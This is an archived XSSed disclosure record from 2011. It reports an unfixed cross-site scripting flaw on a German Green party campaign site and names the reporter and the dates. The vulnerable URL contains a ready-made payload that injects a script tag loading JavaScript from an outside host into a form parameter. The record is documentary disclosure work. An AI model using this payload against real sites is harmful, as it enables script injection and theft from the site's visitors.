Unfixed XSS vulnerability at meinekampagne.gruene.de

2011-03-29T00:00:00
ID XSSED:72460
Type xssed
Reporter zombielove
Modified 2011-12-16T00:00:00

Description

Security researcher zombielove, has submitted on 29/03/2011 a cross-site-scripting (XSS) vulnerability affecting meinekampagne.gruene.de, which at the time of submission ranked 209405 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://meinekampagne.gruene.de/widget/name2/-/preregistrationaction_INSTANCE_Ev2O?_preregistrationaction_INSTANCE_Ev2O_firstName=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E